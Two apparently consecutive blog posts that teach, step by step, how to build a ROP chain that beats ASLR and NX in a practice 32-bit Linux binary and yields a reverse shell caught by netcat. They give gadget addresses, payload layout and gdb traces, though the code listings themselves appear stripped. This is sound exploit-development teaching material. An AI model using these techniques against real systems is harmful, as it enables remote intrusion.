We are going to run into a few major problems while building this exploit.
Firstly, as I already mentioned ecx manipulation is highly restrictive.
Secondly, we are unable to send nulls (0x0) so we will need to put in placeholders and change their value in memory during runtime.
Lastly, we have no idea of any memory addresses within the payload that we will send, so we will have to calulate them during runtime also so that we can reference certain parts of our payload for various reasons.
Because our main 2 problems are to do with values within our payload and because we are unable to exploit this without being able to reference values within our payload we need to approach this problem first.
We do this by getting any address within our payload and calculating the rest of the addresses relative to that address.
The easiest way to do this is by getting the value of esp which, throughout our exploit, will point to a certain part of the payload.
There are various ways to do this (eg. by finding a mov [reg], esp
, add [reg], esp
) but we will use the following push
, pop
sequence to get the value of esp into ebp:
1 |
|
And then move the value of ebp into eax:
1 |
|
Because eax is the most used register in our avaliable ROP gadgets, its handy to be able to move values into eax for further processing.
Analysing The Exploit
Its important to analyse this exploit throughout the development of the exploit because of the complexity of it.
The methodology that I will use here you will need to use thoroughly while developing the exploit.
First we write a python exploit containing the 2 ROP gadgets we have found so far:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
|
All this is doing is sending 532 A's to overflow the buffer until we start overwriting the return address.
Then we open the vulnerable application using gdb and run the exploit against it:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 |
|
Firstly, on line 4, I disassemble the checkpass function, this is the vulnerable function so our exploit gets triggered when this function returns (runs its ret
instruction).
We need to set a breakpoint at the address of this ret
instruction (0x080486e4 on line 34 and set on line 36) so that we can trace through and observe the values of the registers as our exploit runs.
Lines 38 to 43, I define a function that runs every time execution stops, this just give us the top 10 values on the stack (as referenced by esp) and the current instruction to be run (as referenced by eip).
Next, on lines 44 and 45, I instruct gdb to display the values of the ebp and eax registers, this will also run every time execution stops, these are the 2 registers we are manipulating with our first 2 gadgets.
Lastly I run the application and when I launch the exploit breakpoint 1 is reached (on line 53).
As you can see, from line 51, eip now points to the ret
instruction at the end of the checkpass function, which is where our exploit begins.
The current values of eax and ebp are 0xffffffcd and 0x41414141 respectively.
Looking at the output of x/10xw $esp
, which just prints the top 10 values on the stack, the first value is 0x0807715a (just the address of our first gadget) and the second is 0x080525d0 (which is the address of our second gadget).
After the second gadget is run eax should contain 0xbfffe740 (0xbfffe73c + 0x4).
Now we just trace through the next few instructions using the stepi
gdb command:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
|
So this worked as expected and we now have the address of our second ROP gadget inside eax.
All other addresses can be worked our relative to the address that we currently have.
Calculating An Address
The data that we need to reference we will put at the end of our payload.
Once we have the exploit almost complete we will know the length of our payload but until then we will write the exploit with an arbirary value and change it later.
For this we will use 1000 as the length from the second ROP gadget (the address we just retrieved from esp) to the start of our data.
Next we have to figure out how we will arrange the data at the end of the payload, this will allow us to work out the distances between the different sections of data so that the only value that will need to be changed is the first that we calculate. This will become more clear as we develop more of the exploit.
We need 4 different parts in the data section, the 3 strings and the pointers for the second argument to execve.
Here is how I've laid out the data:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
|
I've used 0xffffffff to represent where we want null bytes, these will have to be overwritten during runtime. We will also need to overwrite the pointers with the correct values at runtime, for now I've just put the placeholders 0xbbbbbbbb, 0xcccccccc and 0xdddddddd so that we can easily tell where we are while debugging the exploit.
It's also worth noting that because we are writing up the stack from lower down, the strings will be in normal order, there is no need to think about little endianness for them.
There is technically no reason to use ////bin/bash instead of /bin/bash here, like there was when writing the shellcode, but it rounds this up to 4 bytes so addresses will be slightly easier to calculate (this is 1 place this exploit could be optimized to reduce the size).
Now we need to calculate the address of the last value in our data (0xffffffff at the bottom)
There are 22 double words (a double word is 4 bytes) in the data, so 22 * 4 = 88
, therefore we have 88 bytes from the top of our data to the end, as we are using 1000 bytes as a placeholder, for the length from the address we currently have to the top of the data, there are 1088 bytes we need to add to the address we got from esp in our first gadget.
Because we can't use nulls in our payload we have to calculate 1088 at runtime, we can do this using only eax and ebx, but first we have to move the value we currently have in eax, we'll move it to edx using this gadget:
1 |
|
Along with moving the value in eax to edx, it pops 3 values off of the stack, we need to deal with this because if we put another gadget directly below this 1 it will be popped off into a register and will not be used.
We will use 0xeeeeeeee to represent junk values that will be popped off the stack but not used.
To calculate 1088 without using null bytes we will use 0xaaaaaaaa and substract the relevent number, to find out that number we do 0xaaaaaaaa - 1088 = 0xaaaaa66a
.
We can subtract 2 values in eax and ebx using the following gadget:
1 |
|
And we can use the following 2 gadgets to get the required values into eax and ebx respectively:
1 2 |
|
Here I think is a good time to mention the importance of keeping notes while you are creating this exploit, here are my notes so far:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 |
|
It's worth noting that to get to a lower value in our payload we need to increase the address and if we want to get to a higher value we need to decrease the address. This is a very important point!
Knowing this, to get to the end of the data from the higher up address we received earlier from esp, we need to add the address to the distance we just calculated.
We can do the addition to calculate the address that we want using this gadget:
1 |
|
This will add eax and ebx and store the result in eax.
First we need to move the value from eax into ebx, for that we can use this gadget:
1 |
|
And then move the address stored in edx (the first address we retrieved from esp) into eax:
1 |
|
If we put all of these together (while remembering to include junk values for the irrelevant pop
instructions contained within the gadgets) we get:
1 2 3 4 5 6 7 |
|
eax will now contain the address of the end of our data.
If you look again at the data you will realise that this address should contain nulls (its the last lot of 0xffffffff right at the end of our payload).
As we have this address we should go ahead and write nulls here so we don't have to worry about it later.
We can write whatever is stored in the eax register to an address stored in the edx register using this gadget:
1 |
|
Before we can do that we need to move the address from eax into edx:
1 |
|
And we need to put 0 into eax:
1 |
|
Using all of this knowledge our notes should look like this (again bear in mind the junk values we need to insert):
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
|
Now would be a good time to test the exploit again, what we will do here is pad the rest of the exploit so that our data starts 1000 bytes after our second ROP gadget, this way we can see if our exploit is calculating the correct values.
Here is the updated exploit:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 |
|
This time I will set the breakpoint at 0x08083f21 and ensure everything is correct:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 |
|
As you can see, we've successfully written nulls where the f's used to be at the end of our data.
After, I've printed the 3 values further up our payload (which are just where our pointers will be) just to show that it is infact the correct address we are writing to.
Now that we've fixed the nulls at the bottom, the next problem we should approach is setting the value for the ecx register, as this will be the second most difficult challenge.
Setting ECX
The gadget that I felt was the best chance of getting a value into ecx is:
1 |
|
ecx needs to contain the address of the beginning of our pointers in the data, where we have put 0xbbbbbbbb.
There is a big problem here, this code will jump to the fixed address 0x804dca1 if the value pointed to by eax does not contain 0.
This means we first have to write 0 there before we can set ecx.
We will use the exact same method that we just used to write 0 to the end of the data, except this time we will calculate the address relative to the current value of edx (the end of the data section).
We use the following series of ROP gadgets to do this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
|
We've used all of these gadgets already so unless we miscalculate the distance somewhere this should all work fine and we can run the other gadget to set ecx.
Once we run the gadget to move eax into ecx the value of ecx is set and will no longer need to be touched, this also means we cannot run any gadgets that alter ecx in anyway.
Calculating The Address Of A String And Setting The Pointer
As we already have the address of the first pointer in edx we might as well set this to the correct value.
This should contain the address of the string ////bin/bash, which is the first string in the data section.
If you work it out you will see that the start of the relevant string is 18 double words, or 72 bytes, from the current value of edx (and ecx).
We can now use the exact same gadgets that we've already used to calculate the address of the string and write it to the location pointed to by edx:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
Now would be a good time to test the exploit again.
At the end of this we expect ecx and edx to point to the beginning of our pointers, eax should point to our ////bin/bash string which should also be wirrten to the address that ecx and edx points to.
We have also wirtten nulls at the end of our data (but we haven't changed this code and we've already tested it so that should work fine unless we've made a calculation error).
Here is the updated notes:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 |
|
This is our updated exploit:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 |
|
When we test this we want to break at 0x08083f21, but there are 3 times we are using this gadget so we should continue through the first 2 and then check the values:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 |
|
Clearly we can see that we have written the correct address to the pointer and it now points to the correct string.
The reason we have the rest of the stuff there is because the examine command (x
) in gdb when printing a string (x/s
) stops when the first null is reached and we haven't changed the null termination to the end of the string yet.
Calculating And Writing The Remaining Nulls
We should now go about writing the nulls to the relevant parts in our data, we still have 3 nulls to write, 1 to terminate each of the string arguments.
I will not walk through each of these because I will use the exact same method but it is important to test the exploit at regular intevals to ensure you aren't miscalculating any values because if you do that it will spoil the rest of the exploit.
If it isn't obvious by now, what I'm doing is using edx as a pointer to where I want to write, using eax and ebx to work out the distance from the current value of edx to the next value, then calculating the address of the next value and finally moving that value into edx and writing zero to it.
Here are my notes updated to the point where all of the nulls have been set:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 |
|
At this point all of our strings should be correctly null terminated.
Let's test this, I won't post the exploit script to try and keep the size of this post down a little but all I've done is put the relevant values into the script in the order I've put them in my notes.
To make it easier to break at the end I've put a gadget that I haven't use elsewhere (at 0x808456c) so that I can just break at the end and inspect memory:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
|
So our 3 strings are now correctly null terminated.
I calculated the addresses from the value stored at the address that ecx points to (the address of the first pointer that we wrote earlier).
On line 18 I instruct gdb to display the value of ecx, I then use the examine command to display the string at the address contained there.
I then add 18 (the number of bytes until the -c string) and display that string and add another 6 (the number of bytes from that point to the next string) to display the last string.
Writing The Remaining Pointers
As with the code we just wrote I will not go through every step as the method I will use is the same.
I will be working out the address of the first pointer that I need to change (firstly being the pointer to the -c argument string) using eax and ebx and using edx as the point of reference.
I will then be putting that address into edx, working out the address of the string that that pointer should be pointing to using the same method (which stores the address in eax) and then writing the value that eax contains into the address pointed to by edx.
There are 2 pointers that we need to do this for, the pointer to -c and the pointer to the long string (the actual reverse shell).
If you've fully understood the post so far, this should be a reasonably trivial task.
Here is the section of my notes that do this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 |
|
Now all of the pointers should point to the correct strings.
It's time to test it again, I will be using the same breakpoint trick I used last time:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
|
Great, so that worked perfectly.
Setting Up The Rest Of The Registers And Inserting The Last Of The Gadgets
We now have everything setup except for the values of the eax, ebx and edx registers.
edx just needs to point to 1 of the nulls that we wrote, ebx should contain the address of the ////bin/bash string and eax should contain the value 11.
We will deal with edx first because we have to use ebx and eax afterwards.
We will then calculate the address that needs to go into ebx.
Lastly we will get 11 into eax and finally run int 0x80
.
Here are my full finished notes.
Finishing The Exploit And Testing It
Now that we've got the full size of the exploit we can calculate the size of our code and recalculate the distance from the address that we first receive to our data.
I done this using a python script with all of the gadgets in, you can find that script here.
This shows us that the distance is 908 bytes and not 1000 bytes.
To recalculate this we do the sum 0xaaaaaaaa - (908 + 88) = 0xaaaaa6c6
, so this is the new value that we need to pop into ebx at the start of our application to calculate the first address.
Now we have finished writing the exploit:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 |
|
Firstly we need to start netcat listening on port 8000 to catch the reverse shell:
1 |
|
Now we should launch the vulnerable application (notice I'm using a different user to make it more obvious when the exploit works):
1 |
|
Lastly we need to launch the exploit and watch the terminal that we are running netcat in:
1 |
|
Now looking at the terminal with netcat running and test by running some commands:
1 2 3 4 5 6 7 8 9 |
|
PWNED!!! :-D
Conclusion
It's important to realise that this exploit will not work against any other application, and might not even work with the same application run in a different environment (ie. on a different kernel version) or compiled with a different compiler or compiler version.
This is why it's so important to get as much information about the target environment as possible before developing an exploit for it.
That said, if you have understood this post you should now be able to develop a ROP exploit for any application on a 32 bit Linux system and beat both ASLR and NX, you just have to use the methodology we used here.
A bit of creativity needs to be used to create 1 of these exploits.
Happy Hacking :–)
Further Reading
I've not actually read anything relevant to ROP exploitation just simple explainations for how it works.
Improving The ROP Exploit
So after the last post I kept thinking of ways that I could improve the exploit so I decided to do it.
If you haven't already read the last post on developing a ROP exploit, you should read that before this because I will not cover anything that I covered there and it is just a continuation of that. You can read it here.
As with any exploit development the main point of interest for improvement is reducing the size of the payload so this is where I will focus.
You can think about obfuscation and such in certain exploitations but when ROP is required obfuscation isn't really an option.
Why/How ROP Works
In the last post I didn't really go into much detail about why or how ROP actually works because the post was already pretty long but I thought I'd go into it a bit here.
In my post titled Basic Binary Auditing, in the section called Stack Frames I explain how function calls and returns work.
The important part of that in terms of ROP is how the function returns. A stack-based buffer overflow exploit is initiated when the vulnerable function returns.
This is because the return address that is stored on the stack is pop'ed off of the stack into eip (the instruction pointer).
This happens because when a function is returning it has no way of knowing where in the application code to continue executing.
Because of this the address that execution should return to after the function is finished is pushed onto the stack when the function is called so that it can be retrieved when its finished.
If you find a stack-based buffer overflow and you are able to send enough data to overwrite this address you can change the flow of execution and point eip wherever you want.
With ROP, understanding this concept is paramount to success. What you are doing is creating your own stack (the same as with return to libc).
The only difference between ROP and return to libc is that instead of "calling" actual library functions you are "calling" snipets of code that resemble the end of a function (a few instructions and then a return), which are called gadgets.
By inserting a bunch of gadgets 1 after another on the stack (chaining) you are controlling the execution flow of the application and with enough gadgets you can build a suitibly large application to do whatever you want.
If you understand this it becomes obvious that esp (the stack pointer) has now become your new eip.
By changing the value of esp you can actually create a new stack elsewhere, this becomes useful for various reasons, eg. if you are constraint for space on the stack (as with in kernel mode) you can allocate space on the heap insert your stack there and change esp to point to your new stack.
I will use this method in this exploit for making ROP function calls and explain how you can use this to make ROP conditional statements.
Moving The Data Section
Back to our exploit.
If you remember we put the data section of our payload at the end but we have 532 A's that we are sending in order to overflow the buffer.
The best way to reduce the size of our exploit to to make as much use of this section at the start as possible.
So we will now move the data section to the start.
I mentioned in the last post that using ////bin/bash instead of /bin/bash wasn't technically needed and was a bit of a waste of space but as we are moving this section to the padding section, which always has to be a fixed 532 bytes, we can leave it as is for now.
If we actually use the whole 532 bytes of this section I will make some changes here to reduce its size but as it is it makes calculations slightly easier.
A ROP Function
IMO, the most exciting part of this new exploit will be the implementation of a "function call".
In the last exploit we were using the same series of gadgets throughout the exploit to calculate addresses.
In a normal application we'd use a function for this, so I thought why shouldn't we here, looking through the avaliable gadgets I created this to do our address calculations:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
|
Here the "return address" (the value on the stack that we need to put back into esp at the end) starts off in the eax register.
The function takes 2 "arguments", ecx, which should contain the starting address of the function, and ebx, which should contain the value 0xaaaaaaaa - [distance from the start of the function to the value we want the address of]
.
As the values we need to calculate are in the data section we want to stick this function below the data section (it could go before but we've have to change the last sub
instruction to an add
instruction).
The return value of this function is stored in edi when this function is finished.
Based on the gadgets we have avaliable there are 2 different ways, that I have found, we can set up the "call" for this function, the first is this:
1 2 3 |
|
And the second:
1 2 3 |
|
Both of these achieve the same outcome and certainly for our purpose there isn't any difference between the 2.
After 1 of these series of instructions we have the address of the function in eax, so we can call the function with the following gadget:
1 |
|
This will put the return address into eax and begin execution at the start of our function.
Once our function returns the return value will be in edi, in our old exploit this value was always put into eax or edx.
We can get this value into eax using this gadget:
1 |
|
And if we want the return value into edx we can use this gadget:
1 |
|
With this gadget we can put a value straight into ebx setting up ebx for the next function call.
All addresses will now be calculated relative to ecx which should contain the address of the start of the function, therefore this should now be the first problem we approach and the final address of ecx should be set after we've finished with the function.
Testing The Exploit
We want to try to minimize the number of junk values as much as possible too so this should be kept in mind while putting the gadgets together.
At this point you should have notes similar to the following:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 |
|
Here I'm using the function to calculate the address of the first set of 0xffffffff (to terminate the long argument string) and writing nulls there.
The actual exploit is a very simple python script, as you should know from the first post, so I will only post the full script at the end when we have developed the final exploit.
You can break at the ret
of the checkpass function and step through each instruction, here I will break at the function call and ensure that is working as expected:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 |
|
So our function seemed to have worked perfectly! :-)
Control Statements
I thought of a few different ways that control statements might be possible but was unable to find any relevant gadgets that was capable of doing it.
Because of this I haven't actually implemented any control statements in the exploit but I will describe a few gadgets that might make it possible.
The main reason I wanted a control statement in the exploit was because quite often I need to move the return value of the function into edx but the gadget to do this requires 4 double words on the stack.
As edx wasn't being used throughout the function I would have liked to find a gadget like this:
1 |
|
If we made sure edx = 0
and esi contained the address of the following gadget:
1 |
|
Then we could move the return value of the function into edx within the function, shrinking the size of the payload a little more.
This allows us the run 1 gadget different depending on the value of 1 register (in this case edx).
If we could find the inverse of this contional jump, like this:
1 |
|
In this case we still have esi spare and we just have to make sure edx is zero if we don't want to take the jump.
Of course the gadget pointed to by esi/edx (or any unused register which a gadget could jump to) could be something similar to the following:
1 |
|
Now, instead of just running 1 gadget, we are able to change the control flow of the application in a much bigger way.
Of course these examples are just dealing with testing if a value is zero or not but there is no reason why we could check for a number of different values with a gadget like the following:
1 |
|
We could place a number of these to test for a number of specific values or even a range using 2 gadgets similar to the following:
1 2 |
|
Obviously there are so many different combinations that could lead to different branches being taken depending on certain values, these values don't necessarily need to be values set by the programmer either.
Consider the following:
1 |
|
Or the following sequence:
1 2 |
|
Now we can test values in memory against specific values and make decisions based on that.
Another option would be with conditional move's, like this:
1 2 |
|
The goal here isn't to give you all of the possibilities that might arise, I don't think that would even be possible (there are so many possibiities), but to show that using a bit of creativity and having the right gadgets you can create reasonably complex applications using ROP.
Obviously you are limited by the gadgets that are avaliable to you though.
A Second Function
I decided to add a second function which would take 3 arguments, the same 2 as the first function but with the extra value inside edx, this would be a value to write to the address that is being calculated.
The resulting function was:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
|
I decided that it would be best if this function could be run almost directly after the first function, so that in cases where we want to write the address of a string into a pointer to that string, the first function could be run to calculate the address of the string and then the second function could be run to write that value into the pointer.
This of course means that it would be best if the return value of the first function was put inside edx, so the first function needs to be edited.
Here is the new first function:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
|
Now we could run the first function as normal, followed by a pop ebx
and the relevant value and immediately run the second function, whose address will already be in eax to write the value we've just calculated.
Running The Second Function Directly
Obviously to write the nulls we want to just run the second function with 0 in edx.
To do this all we have to do is make sure eax contains the distance from ecx (the top of the first function) to the top of the second function, which is 108 bytes, before we add eax, ecx
.
I will use a technique I've not used before to do this. First we have to run the vulnerable application:
1 |
|
Now, in another terminal (as root) we need to find out the pid of the application:
1 2 3 |
|
So our application has the pid 25675, we now need to look at the memory layout of it, this is so we know the memory address range that we need to search:
1 2 3 4 5 6 7 |
|
The top 2 memory segments are static, so we can use anything in these sections of memory, we will look for 108 here using gdb:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 |
|
So we can get the required value into eax using the following:
1 2 3 4 5 6 |
|
But we still need 0 in edx, so far we've only used 1 method to do this (xor eax, eax
and then moving eax to edx) but we are no longer able to use eax so we are going to have to use a different method, here is 1:
1 2 3 4 |
|
Here we are just setting edx to 0xffffffff, which is the maximum value that edx can contain, and then increasing it by 1, which will cause the carry flag to set and edx to contain 0.
Now we just need to call the function as normal:
1 2 |
|
So now in 12 double words, or 48 bytes, we have written zeros to a part of memory (the functions are contained in our padding section which is of fixed size anyway).
The Exploit So Far
If we put everything we've worked out so far together, we get to a point where we've written all of the zeros (or null terminators).
Our notes should now look similar to this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 |
|
Now we have to write the pointer values, we can do this by first running the first function to figure out the address of the string, then running the second function to write that value to the correct place.
Let me demonstrate how to do this with the pointer to the first string (which currently contains 0xbbbbbbbb).
First we find the address of the string:
1 2 3 4 5 |
|
Now we should have the address of the ////bin/bash string in edx.
Now we can write it to the correct location:
1 2 3 |
|
Done :-)
So in 8 double words, or 32 bytes, we've calculated the address of the string, and address of the pointer and written the address of the string over the pointer.
Finalizing The Exploit
We will actually set this pointer last out of the 3 pointers because we will need to set edx and ecx afterwards.
Remember edx needs to point to nulls and ecx needs to point to the beginning on the pointers (the address we wrote to here, which will be contained in edi after running the second function).
But to set ecx the address needs to contain nulls so after running the previous sequence, we can set both ecx and edx to the correct values using these gadgets:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
|
Now the value we want in ebx is at the address pointed to by ecx so the following will give us the right value inside ebx:
1 2 3 4 5 6 7 |
|
Lastly we set eax and initiate the syscall:
1 2 3 4 |
|
Some of you may have noticed the mistake but after building the exploit and running it you will see this fails with a segfault and we get no shell.
Fixing The Exploit
I left this in here because it demonstrates nicely the types of problems you are likely to run into when developing these exploits.
The problem was in the functions, with our previous exploit the gadgets were all run in sequence so it didn't matter if we overwrote previous gadget on the stack as we weren't going to use it again.
In regards to the functions though we are going to run them numberous times so we must ensure that nothing that is vital for the application it overwritten.
The offending gadget (present in both functions) is:
1 |
|
The problem here is that the first push eax
will actually overwrite the gadget itself on the stack.
Let's visualize this a little, just before the above gadget is run, the top of the stack looks like this:
When the gadget is first run, esp changes value by 4 bytes, like this:
Now the push eax
instruction is executed which causes this to happen:
Obviously this is undesirable because when we go to run the function again instead of running the actual gadget it will try to change execution to the value that was put here in the gadgets place.
The only way to deal with this is by removing this gadget and replacing it with something that doesn't edit any important parts of the stack.
One way I am going to solve this is by returning to the main application and moving the value into ebx there, this will however increase the size of the payload.
The second function is easiest to change:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
On line 7 execution is moved back to the main application, there we must move the value, which will be in the edi register, into ebx.
The first function is a bit more difficult because there are 2 instances of the offending gadget.
The first we can deal with the same as in the second function but the second instance is different.
The goal of the end of this function is to move the return value into edx so that the second function can be run directly after.
What we can do is move the value into edi and then xchg edx and edi using the following 2 gadgets:
1 2 |
|
There is 1 problem here, the inc
instruction after the xchg
.
We need to make sure that this (ebx + 0x5e5b04c4) adds up to a memory address that is writable.
After looking at the application memory map over a few runs of the application:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
There are 2 sections of wriable memory that appear to be static (080cc000-080cd000 and 080ca000-080cc000).
As you can see though, these address ranges have low memory addresses, much smaller than the value added to ebx (0x5e5b04c4).
I decided I wanted to use the memory address of 0x080cc004, so I done the sum 0x1080cc004 - 0x5e5b04c4 = 0xa9b1bb40
.
So if we get the value 0xa9b1bb40 into ebx before we run the gadget in question it should work all of the time.
With all of this in mind our new function 1 looks like this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
|
Obviously this is smaller than the original function 1 meaning that the distance between function 1 and 2 will be smaller, in fact it is only 76 (or 0x4c) bytes now instead of 108.
Using the same method as before (attaching to the app using gdb and running find 0x08048000, 0x080ca000, 0x0000004c
) I found that this value is found at the address 0x804ba61.
So we have to go about replacing those where ever we have called function 2 directly.
